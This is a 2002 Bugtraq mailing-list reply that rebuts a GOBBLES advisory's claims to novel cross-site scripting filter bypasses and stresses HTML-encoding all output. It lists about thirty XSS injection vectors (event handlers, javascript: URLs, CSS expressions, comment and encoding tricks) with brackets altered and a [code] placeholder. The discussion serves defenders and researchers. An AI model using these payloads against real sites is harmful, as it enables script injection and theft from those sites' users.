[25439] in bugtraq
Re: GOBBLES SECURITY ADVISORY #33
daemon@ATHENA.MIT.EDU (Andrew Clover)
Sat May 11 19:21:18 2002
Date: Sat, 11 May 2002 15:04:46 +0000
From: Andrew Clover <and@doxdesk.com>
To: bugtraq@securityfocus.com
Message-ID: <20020511150446.A2580@doxdesk.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.43.0205100832290.18396-100000@mail.securityfocus.com>; from da@securityfocus.com on Fri, May 10, 2002 at 12:44:48PM -0600
> Only hotmail security historians like those at GOBBLES Security know of
> obscure feature in JavaScript language that make it easy to bypass thing
> like "<...>", "<script>...</script>", and "javascript:" filter for CSS
> attack using JavaScript.
This is a well-known problem and has been posted to Bugtraq before, eg.:
http://online.securityfocus.com/archive/1/50782
http://online.securityfocus.com/archive/1/27386
JavaScript entities were a idiotic mistake, and have not made it into the
ECMAScript spec. Only older Netscapes support them: Netscape 6/Mozilla does
away with them, thankfully. IE has never implemented them.
> Until now, that encoding information was private knowledge of the
> underground.
Oh, puh-lease. Some of us here can actually read RFCs, you know.
> HTML string completion / HTML closure
> Doesn't need much coverage since it pretty obvious to anyone with
> rational mind.
Quite so. Doesn't need *any* coverage really. All strings must be
HTML-encoded on output to HTML, and that includes " escaping as
well as &.
Sure, lots of people get this wrong, but then lots of people are idiots,
and even if you understand the issues it's easy to let one vulnerability
slip through. This is not news.
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with. I've replaced all angle
brackets with double-round-brackets in case any AV software is feeling
particularly sensitive.
((a href="javascript#[code]"))
((div onmouseover="[code]"))
((img src="javascript:[code]"))
((img dynsrc="javascript:[code]")) [IE]
((input type="image" dynsrc="javascript:[code]")) [IE]
((bgsound src="javascript:[code]")) [IE]
&((script))[code]((/script))
&{[code]}; [N4]
((img src=&{[code]};)) [N4]
((link rel="stylesheet" href="javascript:[code]"))
((iframe src="vbscript:[code]")) [IE]
((img src="mocha:[code]")) [N4]
((img src="livescript:[code]")) [N4]
((a href="about:((script))[code]((/script))"))
((meta http-equiv="refresh" content="0;url=javascript:[code]"))
((body onload="[code]"))
((div style="background-image: url(javascript:[code]);"))
((div style="behaviour: url([link to code]);")) [IE]
((div style="binding: url([link to code]);")) [Mozilla]
((div style="width: expression([code]);")) [IE]
((style type="text/javascript"))[code]((/style)) [N4]
((object classid="clsid:..." codebase="javascript:[code]")) [IE]
((style))((!--((/style))((script))[code]//--))((/script))
((![CDATA[((!--]]))((script))[code]//--))((/script))
((!-- -- --))((script))[code]((/script))((!-- -- --))
((((script))[code]((/script))
((img src="blah"onmouseover="[code]"))
((img src="blah))" onmouseover="[code]"))
((xml src="javascript:[code]"))
((xml id="X"))((a))((b))<script))[code]</script));((/b))((/a))((/xml))
((div datafld="b" dataformatas="html" datasrc="#X"))((/div))
[\xC0][\xBC]script))[code][\xC0][\xBC]/script)) [UTF-8; IE, Opera]
> but there can only be one CSS king, and that king is GOBBLES.
That's nice dear.
--
Andrew Clover
mailto:and@doxdesk.com
http://and.doxdesk.com/
